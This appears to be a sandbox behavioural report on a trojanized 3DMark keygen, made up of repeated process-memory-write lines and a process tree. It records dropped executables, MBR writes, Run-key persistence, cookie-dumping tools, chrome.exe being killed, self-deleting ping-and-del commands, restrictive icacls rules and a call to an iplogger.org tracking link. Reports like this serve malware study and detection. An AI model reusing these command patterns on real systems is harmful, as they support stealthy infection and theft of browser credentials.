424 1A27AE19C9E414DC.exe 113 PID 424 wrote to memory of 3532 424 1A27AE19C9E414DC.exe 113 PID 424 wrote to memory of 3532 424 1A27AE19C9E414DC.exe 113 PID 1108 wrote to memory of 2312 1108 1A27AE19C9E414DC.exe 114 PID 1108 wrote to memory of 2312 1108 1A27AE19C9E414DC.exe 114 PID 1108 wrote to memory of 2312 1108 1A27AE19C9E414DC.exe 114 PID 2856 wrote to memory of 2212 2856 keygen-step-4.exe 115 PID 2856 wrote to memory of 2212 2856 keygen-step-4.exe 115 PID 2856 wrote to memory of 2212 2856 keygen-step-4.exe 115 PID 2312 wrote to memory of 3248 2312 cmd.exe 117 PID 2312 wrote to memory of 3248 2312 cmd.exe 117 PID 2312 wrote to memory of 3248 2312 cmd.exe 117 PID 424 wrote to memory of 808 424 1A27AE19C9E414DC.exe 118 PID 424 wrote to memory of 808 424 1A27AE19C9E414DC.exe 118 PID 424 wrote to memory of 808 424 1A27AE19C9E414DC.exe 118 PID 424 wrote to memory of 808 424 1A27AE19C9E414DC.exe 118 PID 424 wrote to memory of 808 424 1A27AE19C9E414DC.exe 118 PID 424 wrote to memory of 808 424 1A27AE19C9E414DC.exe 118 PID 424 wrote to memory of 3808 424 1A27AE19C9E414DC.exe 119 PID 424 wrote to memory of 3808 424 1A27AE19C9E414DC.exe 119 PID 424 wrote to memory of 3808 424 1A27AE19C9E414DC.exe 119 PID 2212 wrote to memory of 1040 2212 askinstall21.exe 120 PID 2212 wrote to memory of 1040 2212 askinstall21.exe 120 PID 2212 wrote to memory of 1040 2212 askinstall21.exe 120 PID 1040 wrote to memory of 2444 1040 cmd.exe 122 PID 1040 wrote to memory of 2444 1040 cmd.exe 122 PID 1040 wrote to memory of 2444 1040 cmd.exe 122 PID 2856 wrote to memory of 3728 2856 keygen-step-4.exe 123 PID 2856 wrote to memory of 3728 2856 keygen-step-4.exe 123 PID 2856 wrote to memory of 3728 2856 keygen-step-4.exe 123 PID 424 wrote to memory of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 wrote to memory of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 wrote to memory of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 wrote to memory of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 wrote to memory of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 wrote to memory of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 wrote to memory of 248 424 1A27AE19C9E414DC.exe 125 PID 424 wrote to memory of 248 424 1A27AE19C9E414DC.exe 125 PID 424 wrote to memory of 248 424 1A27AE19C9E414DC.exe 125 PID 3728 wrote to memory of 1200 3728 hjjgaa.exe 126 PID 3728 wrote to memory of 1200 3728 hjjgaa.exe 126 PID 3728 wrote to memory of 1200 3728 hjjgaa.exe 126 PID 424 wrote to memory of 3020 424 1A27AE19C9E414DC.exe 127 PID 424 wrote to memory of 3020 424 1A27AE19C9E414DC.exe 127 PID 424 wrote to memory of 3020 424 1A27AE19C9E414DC.exe 127 PID 424 wrote to memory of 3020 424 1A27AE19C9E414DC.exe 127 PID 424 wrote to memory of 3020 424 1A27AE19C9E414DC.exe 127 PID 424 wrote to memory of 3020 424 1A27AE19C9E414DC.exe 127 PID 424 wrote to memory of 1356 424 1A27AE19C9E414DC.exe 128 PID 424 wrote to memory of 1356 424 1A27AE19C9E414DC.exe 128 PID 424 wrote to memory of 1356 424 1A27AE19C9E414DC.exe 128 PID 3728 wrote to memory of 812 3728 hjjgaa.exe 129 PID 3728 wrote to memory of 812 3728 hjjgaa.exe 129 PID 3728 wrote to memory of 812 3728 hjjgaa.exe 129 PID 424 wrote to memory of 3744 424 1A27AE19C9E414DC.exe 130 PID 424 wrote to memory of 3744 424 1A27AE19C9E414DC.exe 130 PID 424 wrote to memory of 3744 424 1A27AE19C9E414DC.exe 130 PID 424 wrote to memory of 1928 424 1A27AE19C9E414DC.exe 131 PID 424 wrote to memory of 1928 424 1A27AE19C9E414DC.exe 131 PID 424 wrote to memory of 1928 424 1A27AE19C9E414DC.exe 131 PID 424 wrote to memory of 3152 424 1A27AE19C9E414DC.exe 132 PID 424 wrote to memory of 3152 424 1A27AE19C9E414DC.exe 132 PID 424 wrote to memory of 3152 424 1A27AE19C9E414DC.exe 132 PID 3152 wrote to memory of 1116 3152 1021C014A4C9A552.exe 133 PID 3152 wrote to memory of 1116 3152 1021C014A4C9A552.exe 133 PID 3152 wrote to memory of 1116 3152 1021C014A4C9A552.exe 133 PID 424 wrote to memory of 688 424 1A27AE19C9E414DC.exe 134 PID 424 wrote to memory of 688 424 1A27AE19C9E414DC.exe 134 PID 424 wrote to memory of 688 424 1A27AE19C9E414DC.exe 134 PID 688 wrote to memory of 3716 688 cmd.exe 136 PID 688 wrote to memory of 3716 688 cmd.exe 136 PID 688 wrote to memory of 3716 688 cmd.exe 136 PID 1116 wrote to memory of 2620 1116 1021C014A4C9A552.tmp 137 PID 1116 wrote to memory of 2620 1116 1021C014A4C9A552.tmp 137 PID 1116 wrote to memory of 2620 1116 1021C014A4C9A552.tmp 137 PID 1116 wrote to memory of 896 1116 1021C014A4C9A552.tmp 138 PID 1116 wrote to memory of 896 1116 1021C014A4C9A552.tmp 138 PID 1116 wrote to memory of 896 1116 1021C014A4C9A552.tmp 138 PID 2620 wrote to memory of 184 2620 seed.sfx.exe 140 PID 2620 wrote to memory of 184 2620 seed.sfx.exe 140 PID 2620 wrote to memory of 184 2620 seed.sfx.exe 140 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3796 wrote to memory of 808 3796 MicrosoftEdgeCP.exe 145 PID 3028 wrote to memory of 4664 3028 Process not Found 152 PID 3028 wrote to memory of 4664 3028 Process not Found 152 PID 3028 wrote to memory of 4664 3028 Process not Found 152 PID 3028 wrote to memory of 4692 3028 Process not Found 153 PID 3028 wrote to memory of 4692 3028 Process not Found 153 PID 3028 wrote to memory of 4692 3028 Process not Found 153 PID 3028 wrote to memory of 4720 3028 Process not Found 154 PID 3028 wrote to memory of 4720 3028 Process not Found 154 PID 3028 wrote to memory of 4720 3028 Process not Found 154 PID 3028 wrote to memory of 4748 3028 Process not Found 155 PID 3028 wrote to memory of 4748 3028 Process not Found 155 PID 3028 wrote to memory of 4748 3028 Process not Found 155 PID 4664 wrote to memory of 4864 4664 571A.exe 156 PID 4664 wrote to memory of 4864 4664 571A.exe 156 PID 4664 wrote to memory of 4864 4664 571A.exe 156 PID 3028 wrote to memory of 4876 3028 Process not Found 157 PID 3028 wrote to memory of 4876 3028 Process not Found 157 PID 3028 wrote to memory of 4876 3028 Process not Found 157 PID 4720 wrote to memory of 4980 4720 5CF8.exe 158 PID 4720 wrote to memory of 4980 4720 5CF8.exe 158 PID 4720 wrote to memory of 4980 4720 5CF8.exe 158 PID 4664 wrote to memory of 5052 4664 571A.exe 160 PID 4664 wrote to memory of 5052 4664 571A.exe 160 PID 4664 wrote to memory of 5052 4664 571A.exe 160 PID 4720 wrote to memory of 5096 4720 5CF8.exe 161 PID 4720 wrote to memory of 5096 4720 5CF8.exe 161 PID 4720 wrote to memory of 5096 4720 5CF8.exe 161 PID 4720 wrote to memory of 4392 4720 5CF8.exe 163 PID 4720 wrote to memory of 4392 4720 5CF8.exe 163 PID 4720 wrote to memory of 4392 4720 5CF8.exe 163 PID 3028 wrote to memory of 1060 3028 Process not Found 165 PID 3028 wrote to memory of 1060 3028 Process not Found 165 PID 3028 wrote to memory of 1060 3028 Process not Found 165 PID 4720 wrote to memory of 4400 4720 5CF8.exe 166 PID 4720 wrote to memory of 4400 4720 5CF8.exe 166 PID 4720 wrote to memory of 4400 4720 5CF8.exe 166 PID 4720 wrote to memory of 4640 4720 5CF8.exe 168 PID 4720 wrote to memory of 4640 4720 5CF8.exe 168 PID 4720 wrote to memory of 4640 4720 5CF8.exe 168 PID 4720 wrote to memory of 4296 4720 5CF8.exe 170 PID 4720 wrote to memory of 4296 4720 5CF8.exe 170 PID 4720 wrote to memory of 4296 4720 5CF8.exe 170 PID 4748 wrote to memory of 4728 4748 615E.exe 173 PID 4748 wrote to memory of 4728 4748 615E.exe 173 PID 4748 wrote to memory of 4728 4748 615E.exe 173 PID 3028 wrote to memory of 4808 3028 Process not Found 175 PID 3028 wrote to memory of 4808 3028 Process not Found 175 PID 3028 wrote to memory of 4808 3028 Process not Found 175 PID 3028 wrote to memory of 5104 3028 Process not Found 176 PID 3028 wrote to memory of 5104 3028 Process not Found 176 PID 3028 wrote to memory of 5104 3028 Process not Found 176 PID 4728 wrote to memory of 4368 4728 cmd.exe 177 PID 4728 wrote to memory of 4368 4728 cmd.exe 177 PID 4728 wrote to memory of 4368 4728 cmd.exe 177 PID 4348 wrote to memory of 3900 4348 pueztfce.exe 178 PID 4348 wrote to memory of 3900 4348 pueztfce.exe 178 PID 4348 wrote to memory of 3900 4348 pueztfce.exe 178 PID 3028 wrote to memory of 720 3028 Process not Found 179 PID 3028 wrote to memory of 720 3028 Process not Found 179 PID 3028 wrote to memory of 720 3028 Process not Found 179 PID 4348 wrote to memory of 3900 4348 pueztfce.exe 178 PID 4348 wrote to memory of 3900 4348 pueztfce.exe 178 PID 5052 wrote to memory of 4896 5052 571A.exe 180 PID 5052 wrote to memory of 4896 5052 571A.exe 180 PID 5052 wrote to memory of 4896 5052 571A.exe 180 PID 5052 wrote to memory of 4700 5052 571A.exe 181 PID 5052 wrote to memory of 4700 5052 571A.exe 181 PID 5052 wrote to memory of 4700 5052 571A.exe 181 PID 720 wrote to memory of 4124 720 94D7.exe 182 PID 720 wrote to memory of 4124 720 94D7.exe 182 PID 720 wrote to memory of 4124 720 94D7.exe 182 PID 720 wrote to memory of 4124 720 94D7.exe 182 PID 720 wrote to memory of 4124 720 94D7.exe 182 PID 720 wrote to memory of 4124 720 94D7.exe 182 PID 3028 wrote to memory of 1456 3028 Process not Found 183 PID 3028 wrote to memory of 1456 3028 Process not Found 183 PID 3028 wrote to memory of 1456 3028 Process not Found 183 PID 1456 wrote to memory of 4940 1456 A64D.exe 184 PID 1456 wrote to memory of 4940 1456 A64D.exe 184 PID 1456 wrote to memory of 4940 1456 A64D.exe 184 PID 5052 wrote to memory of 1380 5052 571A.exe 185 PID 5052 wrote to memory of 1380 5052 571A.exe 185 PID 5052 wrote to memory of 1380 5052 571A.exe 185 PID 3028 wrote to memory of 3200 3028 Process not Found 186 PID 3028 wrote to memory of 3200 3028 Process not Found 186 PID 3028 wrote to memory of 3200 3028 Process not Found 186 PID 3200 wrote to memory of 4112 3200 AD53.exe 187 PID 3200 wrote to memory of 4112 3200 AD53.exe 187 PID 3200 wrote to memory of 4112 3200 AD53.exe 187 PID 4112 wrote to memory of 4884 4112 cmd.exe 189 PID 4112 wrote to memory of 4884 4112 cmd.exe 189 PID 4112 wrote to memory of 4884 4112 cmd.exe 189 PID 1456 wrote to memory of 4756 1456 A64D.exe 191 PID 1456 wrote to memory of 4756 1456 A64D.exe 191 PID 1456 wrote to memory of 4756 1456 A64D.exe 191 PID 4692 wrote to memory of 1964 4692 5806.exe 192 PID 4692 wrote to memory of 1964 4692 5806.exe 192 PID 4692 wrote to memory of 1964 4692 5806.exe 192 PID 1964 wrote to memory of 4220 1964 cmd.exe 194 PID 1964 wrote to memory of 4220 1964 cmd.exe 194 PID 1964 wrote to memory of 4220 1964 cmd.exe 194 PID 1380 wrote to memory of 4920 1380 5.exe 195 PID 1380 wrote to memory of 4920 1380 5.exe 195 PID 1380 wrote to memory of 4920 1380 5.exe 195 PID 4920 wrote to memory of 2008 4920 cmd.exe 197 PID 4920 wrote to memory of 2008 4920 cmd.exe 197 PID 4920 wrote to memory of 2008 4920 cmd.exe 197 PID 1060 wrote to memory of 3696 1060 76AD.exe 198 PID 1060 wrote to memory of 3696 1060 76AD.exe 198 PID 1060 wrote to memory of 3696 1060 76AD.exe 198
Processes
-
C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exeintro.exe 1O5ZF3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:3600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:208
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\sibFCE0.tmp\0\setup.exe"C:\Users\Admin\AppData\Local\Temp\sibFCE0.tmp\0\setup.exe" -s5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"7⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exeC:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp17⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:424 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:1712
-
-
C:\Users\Admin\AppData\Roaming\1605887554245.exe"C:\Users\Admin\AppData\Roaming\1605887554245.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605887554245.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:808
-
-
C:\Users\Admin\AppData\Roaming\1605887560120.exe"C:\Users\Admin\AppData\Roaming\1605887560120.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605887560120.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3808
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:3768
-
-
C:\Users\Admin\AppData\Roaming\1605887565839.exe"C:\Users\Admin\AppData\Roaming\1605887565839.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605887565839.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:3020
-
-
C:\Users\Admin\AppData\Roaming\1605887569464.exe"C:\Users\Admin\AppData\Roaming\1605887569464.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605887569464.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3744
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP8⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exeC:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\is-8F4FP.tmp\1021C014A4C9A552.tmp"C:\Users\Admin\AppData\Local\Temp\is-8F4FP.tmp\1021C014A4C9A552.tmp" /SL5="$8007E,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1116 -
C:\Program Files (x86)\RearRips\seed.sfx.exe"C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s110⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2620 -
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:184
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Ahe7"10⤵
- Checks computer location settings
PID:896
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"8⤵PID:688
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
PID:3716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exeC:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp17⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:3792
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:3164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"8⤵PID:2312
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
PID:3248
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"7⤵PID:1272
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 38⤵
- Runs ping.exe
PID:2156
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2212 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:1040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:2444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:1200
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:812
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9531E6A9F89276363CD152F550A54E6 C2⤵
- Loads dropped DLL
PID:1976
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1972
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3816
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3796
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:808
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4452
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4548
-
C:\Users\Admin\AppData\Local\Temp\571A.exeC:\Users\Admin\AppData\Local\Temp\571A.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4664 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\2a64b66f-6d0b-4709-b3fc-98e65bf4c601" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\571A.exe"C:\Users\Admin\AppData\Local\Temp\571A.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
PID:5052 -
C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\updatewin1.exe"C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\updatewin1.exe"3⤵
- Executes dropped EXE
PID:4896
-
-
C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\updatewin2.exe"C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\updatewin2.exe"3⤵
- Executes dropped EXE
PID:4700
-
-
C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\5.exe"C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1380 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\14f2a1fb-62f6-4813-81f3-9f84d5f81f11\5.exe & exit4⤵PID:4920
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
PID:2008
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5806.exeC:\Users\Admin\AppData\Local\Temp\5806.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4692 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5806.exe /f & erase C:\Users\Admin\AppData\Local\Temp\5806.exe & exit2⤵PID:1964
-
